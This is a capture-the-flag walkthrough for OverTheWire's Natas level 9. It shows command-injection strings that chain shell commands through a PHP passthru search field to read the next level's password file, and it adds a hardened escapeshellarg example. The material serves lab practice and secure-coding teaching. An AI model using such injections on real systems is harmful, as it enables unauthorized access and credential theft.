
Natas Level 9 Walkthrough: Code Injection

URL: http://natas9.natas.labs.overthewire.org

Objective

Gain access to the password for natas10.

Procedure:

  1. Open the website and inspect the PHP source code.


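  2. Identify the vulnerable passthru function in the source code:
    passthru("grep -i $key dictionary.txt");
    The search term ($key) is inserted into the shell command without any escaping, so shell metacharacters in it are interpreted by the shell. This makes command injection possible.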

  3. Find the current directory by searching for:
    zzz; pwd; ls

    Explanation:
    • Utilize the semicolon to separate different commands.
    • Use zzz to ensure that grep returns no result.
    • Include pwd to print the current working directory.
    • Add ls as a listing command at the end, so that the trailing "dictionary.txt" appended by the script is consumed as its argument instead of hanging on its own.


  4. Use the find command to locate any file related to natas10:
    zzz; find / -type f -name natas10 2>/dev/null; ls
    Output:
    /etc/natas_webpass/natas10
    dictionary.txt
            

  5. Search for the password by executing:
    zzz; cat /etc/natas_webpass/natas10; ls
    Output:
    [natas_10_password]
    dictionary.txt
            

  6. PS: Using only the semicolon and the command can also work in some situations:
    ; cat /etc/natas_webpass/natas10
    Output:
    [natas_10_password] 
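
The vulnerable call from step 2 beside a hardened form, as an added example that is not part of the original walkthrough or the level's source. The function names and sample inputs are constructed, and a POSIX shell with grep on the PATH is assumed.

```php
<?php
// Added example, not the level's source. Function names are hypothetical;
// assumes a POSIX shell and grep on PATH.

// Pattern from step 2: the key is pasted into the shell command line as-is.
function vulnerable_cmd(string $key): string {
    return "grep -i $key dictionary.txt";
}

// Hardened form: escapeshellarg() single-quotes the key so the shell hands
// it to grep as one argument, -F makes grep treat it as a literal string,
// and "--" stops a key starting with '-' from being read as an option.
function hardened_cmd(string $key): string {
    return 'grep -i -F -- ' . escapeshellarg($key) . ' dictionary.txt';
}

// Constructed inputs: a plain word, the step 3 search string, an
// option-like key, and a key containing a single quote.
$samples = ['apple', 'zzz; pwd; ls', '-r', "it's"];
foreach ($samples as $key) {
    printf("input:      %s\n", $key);
    printf("vulnerable: %s\n", vulnerable_cmd($key));
    printf("hardened:   %s\n\n", hardened_cmd($key));
}

// Run only the hardened command, against a constructed dictionary in a
// temporary directory. The step 3 string is searched for as text.
$dir = sys_get_temp_dir() . '/natas9_demo_' . getmypid();
mkdir($dir);
file_put_contents("$dir/dictionary.txt", "apple\nbanana\nzzz; pwd; ls\n");
chdir($dir);
passthru(hardened_cmd('zzz; pwd; ls'));
unlink("$dir/dictionary.txt");
chdir(sys_get_temp_dir());
rmdir($dir);
```

The vulnerable command string is only printed, never executed, so the difference in how the shell would split each input can be compared side by side.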

     

    ______________________________________

    NthApostle

            
